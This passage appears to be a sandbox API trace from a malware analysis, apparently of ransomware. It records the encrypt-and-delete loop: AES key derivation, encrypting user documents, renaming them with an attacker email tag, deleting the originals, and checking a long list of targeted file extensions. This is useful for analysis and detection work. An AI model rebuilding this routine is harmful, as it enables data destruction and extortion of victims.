m.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0188.920] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0188.920] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0188.921] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\ao66kkoo-.ods" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\ao66kkoo-.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0188.925] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x9a76, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18a640*=0x9a76, lpOverlapped=0x0) returned 1
	[0188.933] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.933] CryptAcquireContextW (in: phProv=0x18a1f0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18a1f0*=0xfcae68) returned 1
	[0188.935] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.935] CryptCreateHash (in: hProv=0xfcae68, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18a1f4 | out: phHash=0x18a1f4) returned 1
	[0188.935] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.936] CryptHashData (hHash=0xfb9530, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0188.936] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.936] CryptDeriveKey (in: hProv=0xfcae68, Algid=0x6610, hBaseData=0xfb9530, dwFlags=0x1, phKey=0x18a1f8 | out: phKey=0x18a1f8*=0xfb90f0) returned 1
	[0188.936] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.936] CryptEncrypt (in: hKey=0xfb90f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18a20c*=0x9a76, dwBufLen=0x9a76 | out: pbData=0x0*, pdwDataLen=0x18a20c*=0x9a80) returned 1
	[0188.938] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0188.938] RtlMoveMemory (in: Destination=0xfe6c00, Source=0xfdd180, Length=0x9a76 | out: Destination=0xfe6c00) 
	[0188.938] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0188.938] CryptEncrypt (in: hKey=0xfb90f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe6c00*, pdwDataLen=0x18a1ec*=0x9a76, dwBufLen=0x9a80 | out: pbData=0xfe6c00*, pdwDataLen=0x18a1ec*=0x9a80) returned 1
	[0189.011] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.011] CryptDestroyKey (hKey=0xfb90f0) returned 1
	[0189.011] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.012] CryptDestroyHash (hHash=0xfb9530) returned 1
	[0189.012] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.012] CryptReleaseContext (hProv=0xfcae68, dwFlags=0x0) returned 1
	[0189.012] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.012] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18a208, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18a208*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0189.013] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0189.013] GetUserNameA (in: lpBuffer=0x18a0ec, pcbBuffer=0x18a204 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18a204) returned 1
	[0189.014] wsprintfW (in: param_1=0x18a220, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\ao66kkoo-.ods.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 127
	[0189.015] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\ao66kkoo-.ods.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\ao66kkoo-.ods.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x390
	[0189.015] WriteFile (in: hFile=0x390, lpBuffer=0xfe6c00*, nNumberOfBytesToWrite=0x9a80, lpNumberOfBytesWritten=0x18a648, lpOverlapped=0x0 | out: lpBuffer=0xfe6c00*, lpNumberOfBytesWritten=0x18a648*=0x9a80, lpOverlapped=0x0) returned 1
	[0189.026] CloseHandle (hObject=0x390) returned 1
	[0189.026] CloseHandle (hObject=0x388) returned 1
	[0189.026] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\ao66kkoo-.ods" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\ao66kkoo-.ods")) returned 1
	[0189.040] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\ao66kkoo-.ods" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\ao66kkoo-.ods")) returned 0
	[0189.041] FindNextFileW (in: hFindFile=0xfb9bf0, lpFindFileData=0x18ae94 | out: lpFindFileData=0x18ae94*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb1ffa0, ftCreationTime.dwHighDateTime=0x1d96912, ftLastAccessTime.dwLowDateTime=0xc2243540, ftLastAccessTime.dwHighDateTime=0x1d96b0d, ftLastWriteTime.dwLowDateTime=0xc2243540, ftLastWriteTime.dwHighDateTime=0x1d96b0d, nFileSizeHigh=0x0, nFileSizeLow=0x4e73, dwReserved0=0x0, dwReserved1=0x0, cFileName="D-W1G.csv", cAlternateFileName="")) returned 1
	[0189.041] lstrcmpW (lpString1="D-W1G.csv", lpString2="..") returned 1
	[0189.041] lstrcmpW (lpString1="D-W1G.csv", lpString2=".") returned 1
	[0189.041] lstrcpyW (in: lpString1=0x18b0e4, lpString2="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\"
	[0189.041] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\", lpString2="D-W1G.csv" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\D-W1G.csv") returned="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\D-W1G.csv"
	[0189.041] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\D-W1G.csv") returned 81
	[0189.042] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0189.042] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Documents\\XmrBEk9xVyp4RZta6St\\ZRxhjZssJTmtcBLglvy\\D-W1G.csv", cchLength=0x51 | out: lpsz="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\d-w1g.csv") returned 0x51
	[0189.042] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.043] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\d-w1g.csv", lpSrch="help_decrypt_your_files") returned 0x0
	[0189.043] lstrcpyW (in: lpString1=0x18ac8c, lpString2="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\d-w1g.csv" | out: lpString1="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\d-w1g.csv") returned="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\d-w1g.csv"
	[0189.043] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\d-w1g.csv") returned 81
	[0189.043] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0189.043] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.044] StrStrW (lpFirst=".csv", lpSrch=".") returned=".csv"
	[0189.044] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0189.044] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".csv") returned=".csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0189.044] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0189.045] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0189.045] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\d-w1g.csv" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\xmrbek9xvyp4rzta6st\\zrxhjzssjtmtcblglvy\\d-w1g.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x388
	[0189.048] ReadFile (in: hFile=0x388, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x4e73, lpNumberOfBytesRead=0x18a640, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18a640*=0x4e73, lpOverlapped=0x0) returned 1
	[0189.057] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
